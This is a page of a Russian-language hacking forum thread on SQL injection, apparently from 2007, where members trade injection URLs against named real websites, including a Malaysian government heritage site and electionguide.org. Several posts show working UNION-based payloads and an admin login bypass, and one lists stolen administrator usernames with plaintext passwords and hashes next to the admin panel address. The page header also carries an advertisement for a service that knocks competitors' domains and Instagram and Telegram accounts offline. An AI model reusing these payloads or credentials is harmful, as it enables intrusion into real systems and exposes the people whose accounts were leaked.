УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 402 из 1242

402

Опции темы

Поиск в этой теме

Опции просмотра

#4011

11.12.2007, 01:58

Saint-Sky

Участник форума

Регистрация: 14.07.2007

Сообщений: 108

Провел на форуме:
1888785

Репутация: 305

2 Momiji

Попробуй таблицу ipoker_users

Код:

http://www.ipoker.com/index.php?p age=6&sub=1%22+UNION+SELECT+1,2, 3,4,5+ipoker_us ers/*

#4012

11.12.2007, 16:04

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

www.electionguide.org

Код:

http://www.electionguide.org/country-news.php?ID=-131+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/*

4.1.20:eguide@localhost:eguide (вывод в титле)
найдена таблица - users, дальше пока никак....

#4013

11.12.2007, 16:25

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от 5taY3r

www.electionguide.org
найдена таблица - users, дальше пока никак....

Код:

http://www.electionguide.org/admin/login.php

Username:' or 1=1/* Password:Nea7

#4014

11.12.2007, 16:50

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

www.altruism.com.my

Код:

http://www.altruism.com.my/index.php?p=lb-detail&fid=-17+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/*

4.1.22-community-nt:dbaatweb@localhost:atweb

#4015

11.12.2007, 18:53

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

www.heritage.gov.my
скуля:

Код:

http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+version(),2,3,4,5,6,7/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83

5.0.45
таблицы:

Код:

http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+TABLE_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83

интересные:
'buku_tamu'-'nama'(логин),'emel'(мыло)
'pentadbir' -'nama'(логин админов),'katalaluan'(пасс админов)...
в названиях чуть голову не сломал...)

Код:

http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+COLUMN_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(112,101,110,116,97,100,98,105,114)/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83

логин:пасс
nanie:9dRozi0uyhUnE
zuraihan:f0tjlY5WLfiik
murugan:murugan
anishariah:$1$4FXU.gOL$IGKdSMr1BYdgIz3lMJMFH1

админка:

Код:

http://www.heritage.gov.my/kekkwa/webadmin/index.php

#4016

11.12.2007, 21:10

~EviL~

Участник форума

Регистрация: 14.08.2007

Сообщений: 150

Провел на форуме:
686641

Репутация: 205

Код HTML:

http://www.dmsbg.com/projects_details_actual.php?id=-39+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11/*

Не смог подобрать имена таблиц. Я завещаю вам продолжить мое благородное дело

#4017

11.12.2007, 21:31

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

http://www.thaitextile.org/ - Тайландский Институт Текстиля

Код:

http://www.thaitextile.org/member/about.asp?member_id=1+or+1=(SELECT+TOP+1+cast(shortname+as+nvarchar)%2B%27%3A%27%2Bcast(passwd+as+nvarchar)+from+member_list)--

#4018

11.12.2007, 21:41

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Программа: MWOpen E-Commerce

Цитата:

http://www.infiera.net/leggi_commenti.asp?id=2489999+union+select+null,nu ll,password,nome,null,data,null+from+utenti+where+ Admin=true

Administrator jonesjones

#4019

11.12.2007, 22:49

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

Чешский бейсбольный клуб "Черные совы".
www.univka.cz

Пришлось юзать cast() =)

Код:

http://www.univka.cz/index.php?inc=news.php&id=-162+union+select+1,2,3,concat_ws(char(58),cast(version()+as+binary),cast(user()+as+binary),cast(database()+as+binary)),5

Version: 4.1.11-Debian_4sarge2banan-log
User: univka.cz@localhost
Database: univka_cz

Последний раз редактировалось ЛифчиС5СВ; 11.12.2007 в 23:24..

#4020

11.12.2007, 23:00

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

www.wycliffecollege.ca

Код:

http://www.wycliffecollege.ca/section.php?aid=8+union+select+concat_ws(0x3a,version(),user(),database()),2/*&sid=38

4.1.11-standard-log:wycliffe@localhost:wycliffe

Страница 402 из 1242

402

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход